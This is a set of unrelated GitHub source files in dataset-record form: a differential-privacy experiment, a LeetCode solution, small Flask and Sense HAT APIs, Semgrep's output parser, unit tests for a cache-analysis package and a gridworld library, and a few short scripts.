function'\n\n # go through each sampled query and add a constraint to the model\n # depending on the type of query\n\n\n countp = countn = 0 #used for tracking index of c and d variables\n for query in sampled_queries:\n vars = []\n for i in range(3):\n col = query[1 + i]\n complement = query[4 + i]\n vars.append(1 - x[col] if complement else x[col])\n if not query[0]: # query is positive\n model += sum(vars) - 3 * c[countp] >= 0\n countp += 1\n else:\n model += -sum(vars) - d[countn] + 3 >= 0\n countn += 1\n # run the solver\n model.solve()\n\n # Using valueOrDefault, free variable with value None are set to 0\n xt = np.array([xvar.valueOrDefault() for xvar in x])\n\n # update the query distribution and normalize\n for i in range(len(Q)):\n Qdist[i] = np.exp(-eta * payoff(D, Q[i], xt)) * Qdist[i]\n psum = sum(Qdist)\n Qdist /= psum\n\n # add this row to synthetic dataset\n synthetic_db.append(xt)\n\n print()\n runtime = time() - start\n\n # calculate maximum error and average error\n result = []\n max_error = avg_error = 0\n for query in Qtest:\n diff = query_3marginal_db_cached(query, test_qcache) \\\n - query_3marginal_db(synthetic_db, query)\n max_error = max(max_error, abs(diff))\n avg_error += abs(diff)\n result.append(diff)\n\n avg_error /= len(result)\n return {\n 'average': avg_error,\n 'max': max_error,\n 'runtime': runtime\n }\n\ndef average_nexperiments(n, start_time, **kwargs):\n \"\"\" Run the algorithm for multiple runs and log the average of results\n\n Args:\n n: number of runs\n start_time: start_time used for logging\n **kwargs: keyword arguments for run_experiment\n \"\"\" \n avg_error = 0\n max_error = 0\n runtime = 0\n\n # run experiment for n number of runs\n for i in range(1, n + 1):\n print('run {}'.format(i))\n result = run_experiment(**kwargs)\n avg_error += result['average']\n max_error += result['max']\n runtime += result['runtime']\n\n max_error /= n\n avg_error /= n\n runtime /= n\n\n # write to log file\n with open('log_{}.json'.format(start_time), 'a') as log:\n dump = {\n 'steps': kwargs['steps'],\n 'eta': kwargs['eta'],\n 'samples': kwargs['samples'],\n 'max_error': max_error,\n 'avg_error': avg_error,\n 'runtime': runtime,\n 'n': len(kwargs['D'])\n }\n\n log.write(json.dumps(dump, sort_keys=True) + '\\n')\n\ndef cache_results(D, Q, Qtest):\n \"\"\" Generating cache for Query set and Test Query set using Dataset\n saves results to global variables training_qcache and test_qcache\n\n Args:\n D: Dataset\n Q: Query set\n Qtest: Test Query set\n \"\"\" \n # avoid global lookups for performance\n test_cache = test_qcache\n training_cache = training_qcache\n\n i = 1\n n = len(Q) + len(Qtest)\n\n for query in Q:\n training_cache[query] = query_3marginal_db(D, query)\n print('query {}/{}'.format(i, n), end='\\r', flush=True)\n i += 1\n for query in Qtest:\n test_cache[query] = query_3marginal_db(D, query)\n print('query {}/{}'.format(i, n), end='\\r', flush=True)\n i += 1\n print()\n\ndef calculate_nsteps(eps_min, eps_max, step_count, eta, samples, nrows):\n \"\"\" Calculate `step_count` number of steps for a given range of epsilon\n using given parameters\n\n Args:\n eps_min: lower bound of epsilon\n eps_max: upper bound of epsilon\n step_count: number to steps to calculate\n eta: learning rate eta\n samples: number of samples used in algorithm\n nrows: number of rows in original dataset\n\n Returns:\n a list of generated step values\n \"\"\" \n eps_increment = (eps_max - eps_min) / (step_count - 1)\n\n result = set()\n\n for i in range(step_count):\n current_eps = eps_min + i * eps_increment\n x = (current_eps * nrows) / (eta * samples)\n T1, T2 = np.roots([1, -1, -x]).real\n if T1 >= 1:\n result.add(int(T1))\n if T2 >= 1:\n result.add(int(T2))\n\n return list(result)\n\nif __name__ == '__main__':\n argc = len(argv)\n if argc != 2:\n print('usage: dualquery \\npickle-file contains original'\n ' binary dataset as list of lists')\n exit(1)\n\n pickle_file = argv[1]\n D = load(open(pickle_file, 'rb'))\n n = len(D)\n nbits = len(D[0])\n nqueries = 10000\n print('n = {}, nbits = {}, nqueries = {}'.format(n, nbits, nqueries))\n\n cachefile = 'qcache_r-{}_c-{}_q-{}.p'.format(n, nbits, nqueries)\n # if cache file exists load it, otherwise create cache file and save it\n if Path(cachefile).exists():\n print('Found cache file: {}'.format(cachefile))\n start = time()\n training_qcache, test_qcache = load(open(cachefile, 'rb'))\n Q = list(training_qcache.keys())\n Qtest = list(test_qcache.keys())\n print('Read cache file in {}s'.format(time() - start))\n else:\n print('Generating queries...')\n start = time()\n Q, Qtest = get_queries(nqueries, nbits)\n print('Created queries in {}s'.format(time() - start))\n print('Creating cache...')\n start = time()\n cache_results(D, Q, Qtest)\n print('Generated cache in {}s'.format(time() - start))\n with open(cachefile, 'wb') as cf:\n dump([training_qcache, test_qcache], cf)\n\n\n t = strftime('%m-%d-%H-%M-%S')\n eta = 0.1\n samples = 50\n # get list of steps variable\n steps_list = calculate_nsteps(eps_min=0.1, eps_max=5.0, step_count=15,\n eta=eta, samples=samples, nrows=n)\n\n for steps in steps_list:\n average_nexperiments(3, t, eta=eta, steps=steps,\n samples=samples, D=D, Q=Q, Qtest=Qtest)\n","repo_name":"ssbl/cse660","sub_path":"project/dualquery.py","file_name":"dualquery.py","file_ext":"py","file_size_in_byte":12399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3303619753","text":"\n# https://leetcode.com/problems/gas-station/\n\nclass Solution:\n def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:\n if sum(gas) < sum(cost):\n return -1\n total_cost = [gas[i] - cost[i] for i in range(len(cost))]\n start = 0\n end = 1\n running_sum = 0\n while end != start:\n running_sum += total_cost[end - 1]\n while running_sum < 0:\n running_sum -= total_cost[start]\n start = (start + 1) % len(gas)\n end = (end + 1) % len(gas)\n return start\n \n","repo_name":"Infinidrix/competitive-programming","sub_path":"Day 26/canCompleteCircuit.py","file_name":"canCompleteCircuit.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9633687399","text":"from flask import Flask, request, jsonify\nimport threading\nimport ssl\n\n\n#-----------------------------------------------------------------------------------------------------------------------------------\n#SERVER WEBHOOK\napp = Flask(__name__)\n\n@app.route('/webhook', methods=['POST'])\ndef webhook():\n if request.method == 'POST':\n if request.headers['Content-Type'] == 'application/json':\n data = request.json\n # Procesar los datos del pedido según tus necesidades\n print(data)\n # Realizar aquí las acciones necesarias con los datos del pedido\n return jsonify({'message': 'Solicitud recibida correctamente'}), 200\n else:\n return jsonify({'error': 'Solicitud incorrecta'}), 400\n else:\n return jsonify({'error': 'Método no permitido'}), 405\n\nif __name__ == '__main__':\n # Antes de iniciar Flask, verifica si estás en el hilo principal\n if threading.current_thread() == threading.main_thread():\n app.run(debug=True, port=8501, host=\"0.0.0.0\", ssl_context=\"adhoc\")\n else:\n print(\"No puedes ejecutar la aplicación Flask en un subproceso secundario.\")\n","repo_name":"rfullivarri/Pranna_Orders","sub_path":"woocommerce/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9657945821","text":"import unittest\nfrom datetime import datetime, timedelta\n\nfrom cacheanalysis.collections import RecordCollection\nfrom cacheanalysis.models import CacheMissRecord, CacheHitRecord, CacheDeleteRecord\n\n_BLOCK_HASH_1 = \"123\"\n_BLOCK_HASH_2 = \"456\"\n_BLOCK_HASH_3 = \"789\"\n_TIMESTAMP = datetime(year=2000, month=1, day=1)\n_SIZE = 10\n\n\nclass TestRecordCollection(unittest.TestCase):\n \"\"\"\n Unit tests for `RecordCollection`.\n \"\"\"\n def setUp(self):\n self.records = [\n CacheMissRecord(_BLOCK_HASH_1, _TIMESTAMP, _SIZE),\n CacheMissRecord(_BLOCK_HASH_2, _TIMESTAMP, _SIZE),\n CacheHitRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=1)),\n CacheDeleteRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=2)),\n CacheMissRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=3), _SIZE),\n CacheHitRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=4)),\n CacheHitRecord(_BLOCK_HASH_1, _TIMESTAMP + timedelta(days=5))\n ]\n self.record_collection = RecordCollection()\n for record in self.records:\n self.record_collection.add_record(record)\n\n def test_contains_without_records(self):\n self.assertCountEqual([], RecordCollection())\n self.assertNotIn(self.records[0], RecordCollection())\n\n def test_contains_with_records(self):\n self.assertCountEqual(self.records, self.record_collection)\n self.assertIn(self.records[0], self.record_collection)\n\n def test_iterate_without_records(self):\n self.assertCountEqual(set(), set(RecordCollection()))\n\n def test_iterate_with_records(self):\n self.assertCountEqual(set(self.records), set(self.record_collection))\n\n def test_get_block_hits(self):\n self.assertEqual(3, len(self.record_collection.get_block_hits(_BLOCK_HASH_1)))\n\n def test_get_block_misses(self):\n self.assertEqual(2, len(self.record_collection.get_block_misses(_BLOCK_HASH_1)))\n\n def test_get_block_deletes(self):\n self.assertEqual(1, len(self.record_collection.get_block_deletes(_BLOCK_HASH_1)))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"wtsi-hgi/cache-analysis","sub_path":"cacheanalysis/tests/test_collections.py","file_name":"test_collections.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4816158332","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Diamond collector that reports the count of connections\n tracked by netfilter (nf_conntrack_count).\n\"\"\"\n\nimport subprocess\nimport diamond.collector\n\n\nclass NfConntrackCountCollector(diamond.collector.Collector):\n \"\"\"Diamond collector that reports the count of\n connections tracked by netfilter.\"\"\"\n\n def get_default_config(self):\n config = super(NfConntrackCountCollector, self).get_default_config()\n config['path'] = 'network'\n return config\n\n def count_nf_connections_tracked(self):\n try:\n # Output example 'net.netfilter.nf_conntrack_count = 130698'\n output = subprocess.check_output(\n ['/sbin/sysctl', 'net.netfilter.nf_conntrack_count'],\n stderr=subprocess.STDOUT\n )\n return int(output.split(\"=\")[1].strip())\n except subprocess.CalledProcessError:\n # sysctl can raise an exception if the ip_conntrack_count\n # is not set, for example on systems without ferm/conntrack.\n return 0\n\n def collect(self):\n count = self.count_nf_connections_tracked()\n self.publish('nf_conntrack_count', count)\n","repo_name":"Commonists/fastcci-puppet","sub_path":"modules/diamond/files/collector/nf_conntrack_counter.py","file_name":"nf_conntrack_counter.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11702959140","text":"soma = mil = nome = cont = menor = 0\nwhile True:\n print('=' * 30)\n produto = str(input('Nome do produto: ')).title().strip()\n preco = float(input('Preço: R$'))\n soma += preco\n cont += 1\n print('=' * 30)\n continuar = ' '\n while continuar not in 'SN':\n continuar = str(input('Quer continuar? [S/N] ')).upper().strip()[0]\n if preco > 1000:\n mil += 1\n if cont == 1 or preco < menor:\n menor = preco\n nome = produto\n if continuar == 'N':\n break\nprint('=' * 54)\nprint(f'O total da compra foi R${soma:.2f}')\nprint(f'Temos {mil} produtos custando mais de R$1000.00')\nprint(f'O produto mais barato foi {nome} que custou R${menor:.2f}')\nprint('=' * 54)\n","repo_name":"Nicolas-Lima-zz/Curso-de-Python","sub_path":"Mundos/Mundo 2/Aulas/Aula 15/ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33417228184","text":"\"\"\"\nThis file encapsulates classes necessary in parsing semgrep-core\njson output into a typed object.\n\nNot everything is done here though; Some of the parsing\nof semgrep-core output is done in core_runner.py (e.g.,\nparsing and interpreting the semgrep-core profiling information).\n\nThe precise type of the response from semgrep-core is specified in\nsemgrep_interfaces/semgrep_output_v1.atd\n\"\"\"\nimport copy\nimport dataclasses\nfrom dataclasses import replace\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\n\nimport semgrep.semgrep_interfaces.semgrep_output_v1 as out\nimport semgrep.util as util\nfrom semgrep.error import FATAL_EXIT_CODE\nfrom semgrep.error import OK_EXIT_CODE\nfrom semgrep.error import SemgrepCoreError\nfrom semgrep.error import TARGET_PARSE_FAILURE_EXIT_CODE\nfrom semgrep.rule import Rule\nfrom semgrep.rule_match import CliUniqueKey\nfrom semgrep.rule_match import RuleMatch\nfrom semgrep.rule_match import RuleMatchSet\nfrom semgrep.verbose_logging import getLogger\n\nlogger = getLogger(__name__)\n\n\ndef _core_location_to_error_span(location: out.Location) -> out.ErrorSpan:\n return out.ErrorSpan(\n file=location.path,\n start=location.start,\n end=location.end,\n )\n\n\ndef core_error_to_semgrep_error(err: out.CoreError) -> SemgrepCoreError:\n level = err.severity\n spans: Optional[List[out.ErrorSpan]] = None\n if isinstance(err.error_type.value, out.PatternParseError):\n yaml_path = err.error_type.value.value[::-1]\n error_span = _core_location_to_error_span(err.location)\n config_start = out.Position(line=0, col=1, offset=-1)\n config_end = out.Position(\n line=err.location.end.line - err.location.start.line,\n col=err.location.end.col - err.location.start.col + 1,\n offset=-1,\n )\n spans = [\n dataclasses.replace(\n error_span,\n config_start=config_start,\n config_end=config_end,\n config_path=yaml_path,\n )\n ]\n elif isinstance(err.error_type.value, out.PartialParsing):\n # The spans for PartialParsing errors are contained in the \"error_type\" object\n spans = [\n _core_location_to_error_span(location)\n for location in err.error_type.value.value\n ]\n\n # TODO benchmarking code relies on error code value right now\n # See https://semgrep.dev/docs/cli-usage/ for meaning of codes\n if isinstance(level.value, out.Info_):\n code = OK_EXIT_CODE\n elif (\n isinstance(err.error_type.value, out.ParseError)\n or isinstance(err.error_type.value, out.LexicalError)\n or isinstance(err.error_type.value, out.PartialParsing)\n ):\n code = TARGET_PARSE_FAILURE_EXIT_CODE\n err = replace(err, rule_id=None) # Rule id not important for parse errors\n elif isinstance(err.error_type.value, out.PatternParseError):\n # TODO This should probably be RULE_PARSE_FAILURE_EXIT_CODE\n # but we have been exiting with FATAL_EXIT_CODE, so we need\n # to be deliberate about changing it\n code = FATAL_EXIT_CODE\n else:\n code = FATAL_EXIT_CODE\n\n return SemgrepCoreError(code, level, spans, err)\n\n\ndef core_matches_to_rule_matches(\n rules: List[Rule], res: out.CoreOutput\n) -> Dict[Rule, List[RuleMatch]]:\n \"\"\"\n Convert core_match objects into RuleMatch objects that the rest of the codebase\n interacts with.\n\n For now assumes that all matches encapsulated by this object are from the same rule\n \"\"\"\n rule_table = {rule.id: rule for rule in rules}\n\n def interpolate(\n text: str,\n metavariables: Dict[str, str],\n propagated_values: Dict[str, str],\n mask_metavariables: bool,\n ) -> str:\n \"\"\"Interpolates a string with the metavariables contained in it, returning a new string\"\"\"\n if mask_metavariables:\n for metavariable in metavariables.keys():\n metavariable_content = metavariables[metavariable]\n show_until = int(len(metavariable_content) * util.MASK_SHOW_PCT)\n masked_content = metavariable_content[:show_until] + util.MASK_CHAR * (\n len(metavariable_content) - show_until\n )\n metavariables[metavariable] = masked_content\n\n metavariable_value = propagated_values[metavariable]\n show_until = int(len(metavariable_content) * util.MASK_SHOW_PCT)\n masked_value = metavariable_value[:show_until] + util.MASK_CHAR * (\n len(metavariable_content) - show_until\n )\n propagated_values[metavariable] = masked_value\n\n # Sort by metavariable length to avoid name collisions (eg. $X2 must be handled before $X)\n for metavariable in sorted(metavariables.keys(), key=len, reverse=True):\n text = text.replace(\n \"value(\" + metavariable + \")\", propagated_values[metavariable]\n )\n text = text.replace(metavariable, metavariables[metavariable])\n\n return text\n\n def read_metavariables(\n match: out.CoreMatch,\n ) -> Tuple[Dict[str, str], Dict[str, str]]:\n matched_values = {}\n propagated_values = {}\n\n # open path and ignore non-utf8 bytes. https://stackoverflow.com/a/56441652\n with open(match.path.value, errors=\"replace\") as fd:\n for metavariable, metavariable_data in match.extra.metavars.value.items():\n # Offsets are start inclusive and end exclusive\n start_offset = metavariable_data.start.offset\n end_offset = metavariable_data.end.offset\n\n matched_value = util.read_range(fd, start_offset, end_offset)\n\n # Use propagated value\n if metavariable_data.propagated_value:\n propagated_value = (\n metavariable_data.propagated_value.svalue_abstract_content\n )\n else:\n propagated_value = matched_value\n\n matched_values[metavariable] = matched_value\n propagated_values[metavariable] = propagated_value\n\n return matched_values, propagated_values\n\n def convert_to_rule_match(match: out.CoreMatch) -> RuleMatch:\n rule = rule_table[match.check_id.value]\n matched_values, propagated_values = read_metavariables(match)\n\n message = match.extra.message if match.extra.message else rule.message\n message = interpolate(\n message,\n matched_values,\n propagated_values,\n isinstance(rule.product.value, out.Secrets),\n )\n\n metadata = rule.metadata\n if match.extra.metadata:\n metadata = copy.deepcopy(metadata)\n metadata.update(match.extra.metadata.value)\n\n if match.extra.fix is not None:\n fix = match.extra.fix\n else:\n fix = None\n\n return RuleMatch(\n match=match,\n extra=match.extra.to_json(),\n message=message,\n metadata=metadata,\n severity=match.extra.severity if match.extra.severity else rule.severity,\n fix=fix,\n )\n\n by_unique_key: Dict[CliUniqueKey, RuleMatch] = {}\n for match in res.results:\n rule_match = convert_to_rule_match(match)\n curr = by_unique_key.setdefault(rule_match.cli_unique_key, rule_match)\n if rule_match.should_report_instead(curr):\n by_unique_key[rule_match.cli_unique_key] = rule_match\n\n # TODO: Dict[out.RuleId, RuleMatchSet]\n findings: Dict[Rule, RuleMatchSet] = {rule: RuleMatchSet(rule) for rule in rules}\n for rule_match in by_unique_key.values():\n rule = rule_table[rule_match.rule_id]\n findings[rule].add(rule_match)\n\n # Sort results so as to guarantee the same results across different\n # runs. Results may arrive in a different order due to parallelism\n # (-j option).\n return {rule: sorted(matches) for rule, matches in findings.items()}\n","repo_name":"semgrep/semgrep","sub_path":"cli/src/semgrep/core_output.py","file_name":"core_output.py","file_ext":"py","file_size_in_byte":8123,"program_lang":"python","lang":"en","doc_type":"code","stars":9057,"dataset":"github-code","pt":"48"} +{"seq_id":"4104841635","text":"#!/usr/bin/env python\n\nfrom flask import Flask, request\nfrom flask_cors import CORS\n#import temp_db_data\n\ntry:\n from sense_hat import SenseHat\nexcept:\n utils.install_pkg('sense-hat')\n from sense_hat import SenseHat\n\nsense = SenseHat()\n\n#clear sensehat and intialise light_state\nsense.clear()\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/sensehat/temp',methods=['GET'])\ndef current_temp():\n temp=round(sense.get_temperature(),2)\n return str(temp)\n\n@app.route('/sensehat/temp/',methods=['GET'])\ndef temp_metric(metric):\n if (metric== \"mean\"): \n return str(temp_db_data.mean_temp())\n if (metric== \"max\"):\n return str(temp_db_data.max_temp())\n if (metric== \"min\"): \n return str(temp_db_data.min_temp())\n return \"Metric not found\"\n\n@app.route('/sensehat/light',methods=['POST'])\ndef light_post():\n state=request.args.get('state')\n print (state)\n if (state==\"on\"):\n sense.clear(255,255,255)\n return '{\"state\":\"on\"}'\n else: \n sense.clear(0,0,0)\n return '{\"state\":\"off\"}'\n\n@app.route('/sensehat/light',methods=['GET'])\ndef light_get():\n #check top left pixel value(==0 - off, >0 - on) \n print(sense.get_pixel(0, 0)) \n if sense.get_pixel(0, 0)[0] == 0:\n return '{\"state\":\"off\"}'\n else:\n return '{\"state\":\"on\"}'\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"noelmcloughlin/iot-edge-stepping-stones","sub_path":"webapi/sense_api.py","file_name":"sense_api.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"9756921760","text":"import matplotlib.pyplot as plt\nimport csv\nimport numpy as np\n\nmin_tape_width = 10\nmax_tape_width = 25\n\nwith open('analysis.csv', 'r') as file:\n reader = csv.DictReader(file)\n\n input_compressions = []\n output_compressions = []\n\n for row in reader:\n input_compression = 1 - float(row['input_compression'])\n output_compression = 1 - float(row['output_compression'])\n\n tape_size = int(row['img_and_tape_width'])\n\n if min_tape_width <= tape_size <= max_tape_width:\n input_compressions.append(input_compression)\n output_compressions.append(output_compression)\n\n# c='#00C894'\nplt.scatter(input_compressions, output_compressions, c='#00C894', s=0.1, label='Data Points')\nplt.xlabel('Input compression ratio')\nplt.ylabel('Output compression ratio')\n# plt.title('Scatterplot of tape width vs. compression ratio')\nplt.tight_layout()\n\nplt.title('')\nplt.suptitle('')\nplt.tight_layout()\n\n# Display the plot\nplt.show()\n","repo_name":"marmaladian/flatypi","sub_path":"plot_input_vs_output_compression.py","file_name":"plot_input_vs_output_compression.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70900977426","text":"import glob\nfrom typing import List, Optional, Sequence, Type, Union\n\nimport pytest\n\nfrom gym_gridverse.action import Action\nfrom gym_gridverse.agent import Agent\nfrom gym_gridverse.envs.yaml import factory as yaml_factory\nfrom gym_gridverse.geometry import Area, Orientation, Position, Shape\nfrom gym_gridverse.grid import Grid\nfrom gym_gridverse.grid_object import (\n Color,\n Door,\n Exit,\n Floor,\n GridObject,\n Key,\n Wall,\n)\nfrom gym_gridverse.observation import Observation\nfrom gym_gridverse.spaces import (\n ActionSpace,\n ObservationSpace,\n _max_color_index,\n _max_object_status,\n _max_object_type,\n)\n\n\n# TODO: bad test; implementation detail\n@pytest.mark.parametrize(\n 'colors,expected',\n [\n ([Color.NONE], Color.NONE.value),\n ([Color.NONE, Color.RED], Color.RED.value),\n ([Color.NONE, Color.RED, Color.GREEN], Color.GREEN.value),\n (\n [Color.NONE, Color.RED, Color.GREEN, Color.BLUE],\n Color.BLUE.value,\n ),\n (\n [Color.NONE, Color.RED, Color.GREEN, Color.BLUE, Color.YELLOW],\n Color.YELLOW.value,\n ),\n ],\n)\ndef test_max_color_index(colors: Sequence[Color], expected: int):\n assert _max_color_index(colors) == expected\n\n\n# TODO: bad test; implementation detail\n@pytest.mark.parametrize(\n 'object_types,expected',\n [\n ([Floor, Exit], Floor.num_states()),\n ([Floor, Exit, Door], Door.num_states()),\n ],\n)\ndef test_max_object_status(\n object_types: Sequence[Type[GridObject]], expected: int\n):\n assert _max_object_status(object_types) == expected\n\n\n# TODO: bad test; implementation detail\n@pytest.mark.parametrize(\n 'object_types,expected',\n [\n ([Floor, Exit], Exit.type_index()),\n ([Floor, Exit, Door], Door.type_index()),\n ],\n)\ndef test_max_object_type(\n object_types: Sequence[Type[GridObject]], expected: int\n):\n assert _max_object_type(object_types) == expected\n\n\n@pytest.mark.parametrize(\n 'action_space,expected_contains,expected_not_contains',\n [\n (\n ActionSpace(list(Action)),\n [\n Action.MOVE_FORWARD,\n Action.MOVE_BACKWARD,\n Action.MOVE_LEFT,\n Action.MOVE_RIGHT,\n Action.TURN_LEFT,\n Action.TURN_RIGHT,\n Action.ACTUATE,\n Action.PICK_N_DROP,\n ],\n [],\n ),\n (\n ActionSpace(\n [\n Action.MOVE_FORWARD,\n Action.MOVE_BACKWARD,\n Action.MOVE_LEFT,\n Action.MOVE_RIGHT,\n ]\n ),\n [\n Action.MOVE_FORWARD,\n Action.MOVE_BACKWARD,\n Action.MOVE_LEFT,\n Action.MOVE_RIGHT,\n ],\n [\n Action.TURN_LEFT,\n Action.TURN_RIGHT,\n Action.ACTUATE,\n Action.PICK_N_DROP,\n ],\n ),\n ],\n)\ndef test_action_space_contains(\n action_space: ActionSpace,\n expected_contains: Sequence[Action],\n expected_not_contains: Sequence[Action],\n):\n assert action_space.num_actions == len(expected_contains)\n\n for action in expected_contains:\n assert action_space.contains(action)\n\n for action in expected_not_contains:\n assert not action_space.contains(action)\n\n\n@pytest.mark.parametrize(\n 'shape,expected',\n [\n (Shape(2, 5), Area((-1, 0), (-2, 2))),\n (Shape(3, 5), Area((-2, 0), (-2, 2))),\n (Shape(2, 7), Area((-1, 0), (-3, 3))),\n (Shape(3, 7), Area((-2, 0), (-3, 3))),\n ],\n)\ndef test_observation_space_area(shape: Shape, expected: Area):\n observation_space = ObservationSpace(shape, [], [])\n assert observation_space.area == expected\n\n\n@pytest.mark.parametrize(\n 'shape,expected',\n [\n (Shape(2, 5), Position(1, 2)),\n (Shape(3, 5), Position(2, 2)),\n (Shape(2, 7), Position(1, 3)),\n (Shape(3, 7), Position(2, 3)),\n ],\n)\ndef test_observation_space_agent_position(shape: Shape, expected: Position):\n observation_space = ObservationSpace(shape, [], [])\n assert observation_space.agent_position == expected\n\n\ndef space_contains_observation(\n space_shape: Shape = Shape(2, 5),\n space_objs: Sequence[Type[GridObject]] = [Floor],\n space_colors: Sequence[Color] = [],\n grid: Grid = Grid.from_shape((2, 5)),\n agent_obj: Union[GridObject, None] = None,\n agent_pos: Position = Position(0, 0),\n orientation: Orientation = Orientation.F,\n):\n \"\"\"helper function to test whether space contains obs given inputs\"\"\"\n observation_space = ObservationSpace(space_shape, space_objs, space_colors)\n obs = Observation(grid, Agent(agent_pos, orientation, agent_obj))\n\n return observation_space.contains(obs)\n\n\n@pytest.mark.parametrize(\n 'space_shape,observation_shape,agent_position,expected',\n [\n (Shape(2, 3), Shape(2, 3), Position(1, 1), True),\n (Shape(4, 5), Shape(4, 5), Position(3, 2), True),\n # invalid\n (Shape(2, 3), Shape(2, 5), Position(1, 2), False),\n (Shape(2, 3), Shape(3, 3), Position(2, 1), False),\n (Shape(4, 5), Shape(4, 7), Position(3, 3), False),\n (Shape(4, 5), Shape(5, 5), Position(4, 2), False),\n ],\n)\ndef test_observation_space_contains__shape(\n space_shape: Shape,\n observation_shape: Shape,\n agent_position: Position,\n expected: bool,\n):\n observation_space = ObservationSpace(space_shape, [Floor], [Color.NONE])\n observation = Observation(\n Grid.from_shape(observation_shape),\n Agent(agent_position, Orientation.F),\n )\n\n assert observation_space.contains(observation) == expected\n\n\n@pytest.mark.parametrize(\n 'space_object_types,observation_objects,agent_grid_object,expected',\n [\n ([Floor], [[Floor(), Floor(), Floor()]], None, True),\n ([Floor, Wall], [[Floor(), Floor(), Floor()]], None, True),\n ([Floor, Wall], [[Floor(), Floor(), Wall()]], None, True),\n ([Floor, Wall], [[Floor(), Floor(), Floor()]], Wall(), True),\n # invalid\n ([Floor], [[Floor(), Floor(), Wall()]], None, False),\n ([Floor], [[Floor(), Floor(), Wall()]], Wall(), False),\n ],\n)\ndef test_observation_space_contains__object_types(\n space_object_types: Sequence[Type[GridObject]],\n observation_objects: List[List[GridObject]],\n agent_grid_object: Optional[GridObject],\n expected: bool,\n):\n # NOTE: observation_objects should have shape (1, 3)\n observation_space = ObservationSpace(\n Shape(1, 3), space_object_types, [Color.NONE]\n )\n observation = Observation(\n Grid(observation_objects),\n Agent(Position(0, 1), Orientation.F, agent_grid_object),\n )\n\n assert observation_space.contains(observation) == expected\n\n\n@pytest.mark.parametrize(\n 'space_colors,observation_objects,agent_grid_object,expected',\n [\n ([Color.RED], [[Key(Color.RED)], [Key(Color.RED)]], None, True),\n (\n [Color.RED, Color.BLUE],\n [[Key(Color.RED)], [Key(Color.BLUE)]],\n None,\n True,\n ),\n (\n [Color.RED, Color.BLUE],\n [[Key(Color.RED)], [Key(Color.RED)]],\n Key(Color.BLUE),\n True,\n ),\n # invalid\n ([Color.RED], [[Key(Color.RED)], [Key(Color.BLUE)]], None, False),\n (\n [Color.RED],\n [[Key(Color.RED)], [Key(Color.RED)]],\n Key(Color.BLUE),\n False,\n ),\n ],\n)\ndef test_observation_space_contains__colors(\n space_colors: Sequence[Color],\n observation_objects: List[List[GridObject]],\n agent_grid_object: Optional[GridObject],\n expected: bool,\n):\n # NOTE: observation_objects should have shape (2, 1)\n observation_space = ObservationSpace(Shape(2, 1), [Key], space_colors)\n observation = Observation(\n Grid(observation_objects),\n Agent(Position(1, 0), Orientation.F, agent_grid_object),\n )\n\n assert observation_space.contains(observation) == expected\n\n\n@pytest.mark.parametrize(\n 'shape,position,position_ok',\n [\n (Shape(1, 3), Position(0, 1), True),\n (Shape(2, 5), Position(1, 2), True),\n # invalid\n (Shape(1, 3), Position(-1, -1), False),\n (Shape(1, 3), Position(1, 3), False),\n (Shape(2, 5), Position(-1, -1), False),\n (Shape(2, 5), Position(2, 5), False),\n ],\n)\n@pytest.mark.parametrize(\n 'orientation,orientation_ok',\n [\n (Orientation.F, True),\n # all orientations are valid now\n (Orientation.B, True),\n (Orientation.R, True),\n (Orientation.L, True),\n ],\n)\ndef test_observation_space_contains__agent_transform(\n shape: Shape,\n position: Position,\n position_ok: bool,\n orientation: Orientation,\n orientation_ok: bool,\n):\n observation_space = ObservationSpace(shape, [Floor], [Color.NONE])\n observation = Observation(\n Grid.from_shape(shape), Agent(position, orientation)\n )\n\n expected = position_ok and orientation_ok\n assert observation_space.contains(observation) == expected\n\n\n@pytest.mark.parametrize(\n 'shape',\n [\n Shape(2, 3),\n Shape(4, 5),\n ],\n)\n@pytest.mark.parametrize(\n 'object_types',\n [\n [Floor],\n [Floor, Wall],\n ],\n)\n@pytest.mark.parametrize(\n 'colors',\n [\n [Color.NONE],\n [Color.NONE, Color.RED],\n ],\n)\n@pytest.mark.parametrize(\n 'position',\n [\n Position(0, 0),\n Position(0, 1),\n Position(1, 0),\n Position(1, 1),\n ],\n)\n@pytest.mark.parametrize(\n 'orientation',\n [Orientation.F],\n)\ndef test_observation_space_contains(\n shape: Shape,\n object_types: Sequence[Type[GridObject]],\n colors: Sequence[Color],\n position: Position,\n orientation: Orientation,\n):\n observation_space = ObservationSpace(shape, object_types, colors)\n observation = Observation(\n Grid.from_shape(shape), Agent(position, orientation)\n )\n\n assert observation_space.contains(observation)\n\n\n# NOTE testing of Space.contains methods for all yaml files in yaml/\n@pytest.mark.parametrize('path', glob.glob('yaml/*.yaml'))\ndef test_space_contains_from_yaml(path: str):\n env = yaml_factory.factory_env_from_yaml(path)\n\n state = env.functional_reset()\n env.state_space.contains(state)\n\n 